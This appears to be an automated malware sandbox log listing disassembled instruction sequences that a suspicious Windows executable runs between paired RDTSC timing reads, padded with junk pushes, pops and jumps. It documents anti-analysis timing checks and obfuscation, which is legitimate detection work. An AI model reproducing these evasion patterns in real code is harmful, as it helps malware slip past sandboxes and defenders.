Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCD703 second address: CCD72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DD3h 0x00000009 jns 00007FC19CEC1DC6h 0x0000000f jmp 00007FC19CEC1DCEh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CCD8A1 second address: CCD8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007FC19D472F36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD4AC5 second address: CD4AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD523B second address: CD5240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD5240 second address: CD5246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD5246 second address: CD524A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD524A second address: CD5256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD5948 second address: CD594C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD594C second address: CD595A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC19CEC1DC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CD595A second address: CD5970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19D472F32h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CDD10A second address: CDD146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007FC19CEC1DD1h 0x00000011 jmp 00007FC19CEC1DCBh 0x00000016 pop ecx 0x00000017 jl 00007FC19CEC1DC8h 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 je 00007FC19CEC1DC6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CDD146 second address: CDD160 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC19D472F30h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CEA90C second address: CEA910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CEA910 second address: CEA923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CEA923 second address: CEA92D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC19CEC1DC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: CF58E9 second address: CF58EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0856A second address: D08572 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08572 second address: D08577 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D089DF second address: D089E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D089E3 second address: D089EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D089EC second address: D089F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08CE8 second address: D08D05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F30h 0x00000007 ja 00007FC19D472F26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08D05 second address: D08D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08D0B second address: D08D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D08D11 second address: D08D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FC19CEC1DC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D09907 second address: D0990D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0990D second address: D0993D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC19CEC1DCEh 0x0000000a pop esi 0x0000000b push ecx 0x0000000c jmp 00007FC19CEC1DD5h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0993D second address: D09941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C494 second address: D0C4B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C186D9 second address: C186DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C186DF second address: C186E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C320 second address: D0C330 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC19D472F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C330 second address: D0C334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0C334 second address: D0C347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0E531 second address: D0E555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCEh 0x00000007 jmp 00007FC19CEC1DD2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0E555 second address: D0E582 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push ebx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jl 00007FC19D472F26h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 jmp 00007FC19D472F37h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D0E582 second address: D0E599 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC19CEC1DD2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D500E0 second address: D500EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D500EA second address: D500F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FC19CEC1DC6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D51792 second address: D51798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D51798 second address: D517B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC19CEC1DC8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FC19CEC1DCCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D6004E second address: D6006D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FC19D472F26h 0x0000000d jmp 00007FC19D472F30h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D6006D second address: D60072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D60072 second address: D60077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D60077 second address: D60084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007FC19CEC1DD2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: D60084 second address: D6008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: E25B27 second address: E25B37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC19CEC1DCAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E1C second address: 7130E22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E22 second address: 7130E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F2Ch 0x00000009 sbb si, F5C8h 0x0000000e jmp 00007FC19D472F2Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E45 second address: 7130E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edi, eax 0x00000009 jmp 00007FC19CEC1DD4h 0x0000000e test edi, edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC19CEC1DCDh 0x00000019 xor ax, DD96h 0x0000001e jmp 00007FC19CEC1DD1h 0x00000023 popfd 0x00000024 mov edi, esi 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130E8F second address: 7130EDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC20D171735h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC19D472F33h 0x00000018 and cx, 8F7Eh 0x0000001d jmp 00007FC19D472F39h 0x00000022 popfd 0x00000023 mov dh, ah 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130EDF second address: 7130F21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC19CEC1DD8h 0x00000008 pop ecx 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebp-14h] 0x00000011 jmp 00007FC19CEC1DCDh 0x00000016 mov ecx, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FC19CEC1DCDh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F21 second address: 7130F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F27 second address: 7130F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e jmp 00007FC19CEC1DD6h 0x00000013 mov edx, 76EB06ECh 0x00000018 pushad 0x00000019 mov bl, cl 0x0000001b mov ebx, 06E9A9AEh 0x00000020 popad 0x00000021 mov eax, 00000000h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FC19CEC1DCCh 0x0000002f rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F7C second address: 7130F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F82 second address: 7130F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC19CEC1DCDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F93 second address: 7130F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130F97 second address: 7130FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c jmp 00007FC19CEC1DCDh 0x00000011 pop edi 0x00000012 pushad 0x00000013 push ecx 0x00000014 call 00007FC19CEC1DCFh 0x00000019 pop eax 0x0000001a pop edi 0x0000001b popad 0x0000001c test eax, eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FCD second address: 7130FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FD1 second address: 7130FE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FE2 second address: 7130FE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7130FE7 second address: 713109D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, C400h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FC20CBC04B0h 0x00000011 jmp 00007FC19CEC1DCFh 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 jmp 00007FC19CEC1DD6h 0x0000001e mov eax, dword ptr [esi] 0x00000020 jmp 00007FC19CEC1DD0h 0x00000025 mov dword ptr [edx], eax 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FC19CEC1DCEh 0x0000002e adc ch, FFFFFFD8h 0x00000031 jmp 00007FC19CEC1DCBh 0x00000036 popfd 0x00000037 mov cx, EE8Fh 0x0000003b popad 0x0000003c mov eax, dword ptr [esi+04h] 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FC19CEC1DD0h 0x00000046 sbb cl, 00000038h 0x00000049 jmp 00007FC19CEC1DCBh 0x0000004e popfd 0x0000004f jmp 00007FC19CEC1DD8h 0x00000054 popad 0x00000055 mov dword ptr [edx+04h], eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713109D second address: 71310A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310A2 second address: 71310A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310A8 second address: 71310AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310AC second address: 71310B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71310B0 second address: 7131173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b jmp 00007FC19D472F2Dh 0x00000010 mov dword ptr [edx+08h], eax 0x00000013 jmp 00007FC19D472F2Eh 0x00000018 mov eax, dword ptr [esi+0Ch] 0x0000001b jmp 00007FC19D472F30h 0x00000020 mov dword ptr [edx+0Ch], eax 0x00000023 pushad 0x00000024 mov dx, si 0x00000027 call 00007FC19D472F2Ah 0x0000002c pushfd 0x0000002d jmp 00007FC19D472F32h 0x00000032 sub esi, 36ADEBB8h 0x00000038 jmp 00007FC19D472F2Bh 0x0000003d popfd 0x0000003e pop ecx 0x0000003f popad 0x00000040 mov eax, dword ptr [esi+10h] 0x00000043 jmp 00007FC19D472F2Fh 0x00000048 mov dword ptr [edx+10h], eax 0x0000004b jmp 00007FC19D472F36h 0x00000050 mov eax, dword ptr [esi+14h] 0x00000053 jmp 00007FC19D472F30h 0x00000058 mov dword ptr [edx+14h], eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC19D472F2Ah 0x00000064 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131173 second address: 7131177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131177 second address: 713117D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713117D second address: 7131183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131183 second address: 7131187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131187 second address: 71311B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi+18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC19CEC1DCAh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311B6 second address: 71311BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311BC second address: 71311C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311C2 second address: 71311DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC19D472F2Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71311DA second address: 7131211 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+1Ch] 0x0000000c jmp 00007FC19CEC1DCEh 0x00000011 mov dword ptr [edx+1Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131211 second address: 7131215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131215 second address: 7131219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131219 second address: 713121F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 713121F second address: 71312A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC19CEC1DCEh 0x00000013 and si, A388h 0x00000018 jmp 00007FC19CEC1DCBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FC19CEC1DD8h 0x00000024 sub ax, 85E8h 0x00000029 jmp 00007FC19CEC1DCBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov dword ptr [edx+20h], eax 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC19CEC1DD5h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71312A0 second address: 71312FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC19D472F37h 0x00000009 add ax, 828Eh 0x0000000e jmp 00007FC19D472F39h 0x00000013 popfd 0x00000014 mov si, 0197h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+24h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC19D472F39h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 71312FF second address: 7131305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131305 second address: 7131309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: 7131309 second address: 713131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
